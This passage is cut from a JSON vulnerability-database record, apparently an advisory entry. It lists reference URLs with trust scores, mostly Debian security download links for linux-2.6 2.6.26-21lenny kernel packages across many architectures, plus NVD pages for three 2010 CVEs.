        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0309"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0307"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0298"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
